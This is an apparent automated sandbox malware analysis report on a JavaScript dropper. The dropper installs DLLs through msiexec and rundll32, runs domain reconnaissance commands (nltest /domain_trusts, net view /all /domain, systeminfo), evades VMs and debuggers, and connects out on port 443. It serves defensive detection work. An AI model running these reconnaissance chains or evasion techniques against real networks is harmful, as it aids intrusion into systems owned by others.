Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError, 6_2_00000001800033E0
Source: Update_3b24da5a.dll.6.dr Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c
Source: 360total.dll.2.dr Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c
Source: 360total.dll.2.dr Static PE information: section name: yhDm^
Source: Update_3b24da5a.dll.6.dr Static PE information: section name: yhDm^
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_0071323C push ecx; ret 4_2_0071324F
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180010451 push rcx; ret 6_2_0000000180010452
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001045A push rcx; ret 6_2_000000018001045B
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018017500F push rdx; iretd 6_2_0000000180175010

Persistence and Installation Behavior

Source: C:\Windows\System32\msiexec.exe Executable created and started: C:\Windows\Installer\MSI3B6A.tmp Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\rundll32.exe File created: :wtfbbq (copy) Jump to dropped file
Source: C:\Windows\System32\rundll32.exe File created: C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\sharepoint\360total.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3AAC.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3B6A.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3A4C.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3A7C.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI39EE.tmp Jump to dropped file
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle, 6_2_0000000180049AEC
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180062148 memset,GetModuleFileNameW,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 6_2_0000000180062148
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\rundll32.exe Code function: EnterCriticalSection,memset,GetModuleFileNameW,PathAppendW,StrStrIW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,LeaveCriticalSection, 6_2_00000001800655A8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180049AEC 6_2_0000000180049AEC
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 6_2_00000187EC8568E8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 6_2_00000187EC857FA8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 7_2_00000201DAAE7FA8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 7_2_00000201DAAE68E8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 8_2_000001A3795068E8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 8_2_000001A379507FA8
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 807 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 8931 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Dropped PE file which has not been started: :wtfbbq (copy) Jump to dropped file
Source: C:\Windows\System32\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\sharepoint\360total.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI3AAC.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI3A4C.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI3A7C.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI39EE.tmp Jump to dropped file
Source: C:\Windows\Installer\MSI3B6A.tmp Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Installer\MSI3B6A.tmp API coverage: 7.4 %
Source: C:\Windows\System32\rundll32.exe API coverage: 1.6 %
Source: C:\Windows\System32\rundll32.exe API coverage: 8.4 %
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180049AEC 6_2_0000000180049AEC
Source: C:\Windows\System32\wscript.exe TID: 380 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 6540 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4724 Thread sleep count: 261 > 30 Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4724 Thread sleep time: -261000s >= -30000s Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 5812 Thread sleep count: 807 > 30 Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 5812 Thread sleep time: -80700s >= -30000s Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4724 Thread sleep count: 8931 > 30 Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4724 Thread sleep time: -8931000s >= -30000s Jump to behavior
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_0072AF79 FindFirstFileExW, 4_2_0072AF79
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC85A350 FindFirstFileW,FindNextFileW,LoadLibraryW, 6_2_00000187EC85A350
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC851A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 6_2_00000187EC851A08
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAEA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 7_2_00000201DAAEA350
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAE1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 7_2_00000201DAAE1A08
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A37950A350 FindFirstFileW,FindNextFileW,LoadLibraryW, 8_2_000001A37950A350
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A379501A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 8_2_000001A379501A08
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW7
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA918000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MWrod_VMware_SATA_CD00#4&224f42ef&
Source: wscript.exe, 00000000.00000003.2049218463.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2040729475.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048754066.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046212474.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2158447349.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049827134.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2158447349.00000207B53F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048245243.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA956000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000007.00000002.3337300936.00000201DCA70000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: C:\Windows\System32\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_006FD0A5 IsDebuggerPresent,OutputDebugStringW, 4_2_006FD0A5
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW, 6_2_0000000180066C3C
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError, 6_2_00000001800033E0
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_0072AD78 mov eax, dword ptr fs:[00000030h] 4_2_0072AD78
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_00722DCC mov ecx, dword ptr fs:[00000030h] 4_2_00722DCC
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_006F2310 GetProcessHeap, 4_2_006F2310
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_007133A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_007133A8
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_0071353F SetUnhandledExceptionFilter, 4_2_0071353F
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_00712968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00712968
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_00716E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00716E1B
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_0000000180070760
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_000000018006F6E0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe Network Connect: 104.21.59.82 443 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.136.103 443 Jump to behavior
Source: Document_a19_79b555791-28h97348k5477-3219g9.js Initial file: avast, eset, sophos
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_006F52F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,GetProcessId,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess, 4_2_006F52F0
Source: C:\Windows\Installer\MSI3B6A.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain Jump to behavior
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018004A650 memset,GetModuleFileNameW,PathAppendW,ShellExecuteExW,ILGetSize,GetTickCount,srand,GetCurrentProcess,GetProcessId,GetCurrentThreadId,rand,LocalAlloc,InitializeSecurityDescriptor,LocalFree,SetSecurityDescriptorDacl,CreateFileMappingW,LocalFree,CreateFileMappingW,MapViewOfFile,CloseHandle,memset,memmove,memmove,memmove,memmove,memmove,UnmapViewOfFile,FindWindowW,SetForegroundWindow,memset,wsprintfW,memset,WaitForSingleObject,Sleep,CloseHandle,CloseHandle,CloseHandle, 6_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z, 6_2_0000000180049278
Source: Update_3b24da5a.dll.6.dr Binary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
Source: rundll32.exe Binary or memory string: Progman
Source: rundll32.exe Binary or memory string: Program manager
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_007135A9 cpuid 4_2_007135A9
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: EnumSystemLocalesW, 4_2_0072E0C6
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: EnumSystemLocalesW, 4_2_00727132
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: EnumSystemLocalesW, 4_2_0072E111
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: EnumSystemLocalesW, 4_2_0072E1AC
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 4_2_0072E237
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: GetLocaleInfoEx, 4_2_007123F8
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: GetLocaleInfoW, 4_2_0072E48A
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 4_2_0072E5B3
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: GetLocaleInfoW, 4_2_0072E6B9
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: GetLocaleInfoW, 4_2_007276AF
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 4_2_0072E788
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 4_2_0072DE24
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_007137D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 4_2_007137D5
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC858AE0 GetUserNameA,wsprintfA, 6_2_00000187EC858AE0
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_00727B1F GetTimeZoneInformation, 4_2_00727B1F
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress, 6_2_0000000180040CB0
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: rundll32.exe Binary or memory string: 360tray.exe
Source: rundll32.exe Binary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: rundll32.exe Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe

Stealing of Sensitive Information

Source: Yara match File source: 6.2.rundll32.exe.187ec850000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1ffb4f00000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1ffb4ef0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.187ec840000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.201da900000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1a379500000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.201da900000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.201daae0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1a3794f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1ffb4ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1a379500000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.187ec840000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.187ec850000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1a3794f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.201daae0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1ffb4f00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000003.3125138531.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3337063134.00000201DAAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2157690960.000001A379500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.3003737067.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2138417852.00000187EC840000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3336769043.00000201DA900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.3044326122.00000201DC500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3337150671.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2810393919.000001FFB4F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.3252768479.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2810366627.000001FFB4EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3336481433.000000D2043F8000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2157667357.000001A3794F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 6.2.rundll32.exe.187ec850000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1ffb4f00000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1ffb4ef0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.187ec840000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.201da900000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1a379500000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.201da900000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.201daae0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1a3794f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1ffb4ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1a379500000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.187ec840000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.187ec850000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1a3794f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.201daae0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1ffb4f00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000003.3125138531.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3337063134.00000201DAAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2157690960.000001A379500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.3003737067.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2138417852.00000187EC840000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3336769043.00000201DA900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.3044326122.00000201DC500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3337150671.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2810393919.000001FFB4F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.3252768479.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2810366627.000001FFB4EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3336481433.000000D2043F8000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2157667357.000001A3794F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR